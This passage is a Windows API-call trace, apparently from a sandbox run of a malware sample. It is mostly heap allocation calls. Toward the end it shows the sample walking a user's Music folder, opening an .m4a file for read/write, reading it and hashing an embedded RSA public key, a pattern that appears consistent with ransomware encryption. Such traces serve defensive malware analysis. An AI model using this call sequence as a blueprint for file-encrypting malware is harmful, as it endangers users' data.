| out: hHeap=0x6a0000) returned 1 [0197.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.950] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.951] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.951] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.952] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.953] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0197.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.953] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.955] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2dc80 [0197.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2dc80 | out: hHeap=0x6a0000) returned 1 [0197.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0197.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0197.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.960] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0197.960] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0197.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b4b0 [0197.961] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\") returned="yw2t95\\" [0197.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2d49848 [0197.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b4b0 | out: hHeap=0x6a0000) returned 1 [0197.961] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\") returned="61X TO95hR3JMn6Z\\" [0197.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0197.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47bb8 [0197.961] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49848 | out: hHeap=0x6a0000) returned 1 [0197.961] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\") returned="PsRcKmPEdiF_ OxVk\\" [0197.961] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0197.962] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\") returned="iPggquG4\\" [0197.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0197.962] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\") returned="fUhvLY4JeAGwk\\" [0197.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d4c0 [0197.962] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0197.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.962] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0197.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0197.962] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0197.962] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0197.962] PathFindFileNameW (pszPath="") returned="" [0197.962] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\*" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53d55170, ftCreationTime.dwHighDateTime=0x1d8a0ea, ftLastAccessTime.dwLowDateTime=0x82659fe0, ftLastAccessTime.dwHighDateTime=0x1d8a293, ftLastWriteTime.dwLowDateTime=0x82659fe0, ftLastWriteTime.dwHighDateTime=0x1d8a293, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa90 [0197.976] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53d55170, ftCreationTime.dwHighDateTime=0x1d8a0ea, ftLastAccessTime.dwLowDateTime=0x82659fe0, ftLastAccessTime.dwHighDateTime=0x1d8a293, ftLastWriteTime.dwLowDateTime=0x82659fe0, ftLastWriteTime.dwHighDateTime=0x1d8a293, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0197.976] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6678fec0, ftCreationTime.dwHighDateTime=0x1d8a636, ftLastAccessTime.dwLowDateTime=0xd9956ce0, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0xd9956ce0, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x74fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="A_919xC.m4a", cAlternateFileName="")) returned 1 [0197.976] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\A_919xC.m4a") returned=".m4a" [0197.976] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\fUhvLY4JeAGwk\\iPggquG4\\PsRcKmPEdiF_ OxVk\\61X TO95hR3JMn6Z\\yw2t95\\A_919xC.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\fuhvly4jeagwk\\ipggqug4\\psrckmpedif_ oxvk\\61x to95hr3jmn6z\\yw2t95\\a_919xc.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0197.981] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=29949) returned 1 [0197.981] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0197.983] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x74d7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.984] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0197.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.986] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.986] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x74fd, lpOverlapped=0x0) returned 1 [0197.986] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0197.986] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.986] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.987] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0197.987] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0197.987] CryptHashData (hHash=0x2cbfad0, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.987] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0197.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0197.988] CryptGetHashParam (in: hHash=0x2cbfad0, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0197.988] GetLastError () returned 0x0 [0197.988] CryptDestroyHash (hHash=0x2cbfad0) returned 1 [0197.988] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0197.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0197.988] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0197.988] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0197.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.988] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0197.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0197.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0197.988] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7500) returned 0x2d4f778 [0197.989] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0197.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0197.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0197.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0197.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0197.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0197.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d4c0 [0197.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a468 [0197.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2d508 [0197.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a480 [0197.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4b0 [0197.989] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a510 [0197.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a4c8 [0197.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0197.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0197.990] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0197.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0197.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0197.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0197.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0197.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0197.990] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0197.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a510 [0197.990] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0197.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a4c8 [0197.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0197.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a4b0 [0197.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0197.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0197.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0197.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0197.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0197.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0197.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0197.991] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0197.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0197.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4c8 | out: hHeap=0x6a0000) returned 1 [0197.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0197.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a4b0 | out: hHeap=0x6a0000) returned 1 [0197.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0197.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0197.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a510 | out: hHeap=0x6a0000) returned 1 [0197.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0197.992] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0197.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0197.993] GetCurrentThreadId () returned 0x264 [0197.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0197.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d4c090 [0197.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0197.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0197.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d4d790 [0197.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0197.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0197.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0197.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0197.993] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0197.993] GetCurrentThreadId () returned 0x264 [0197.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 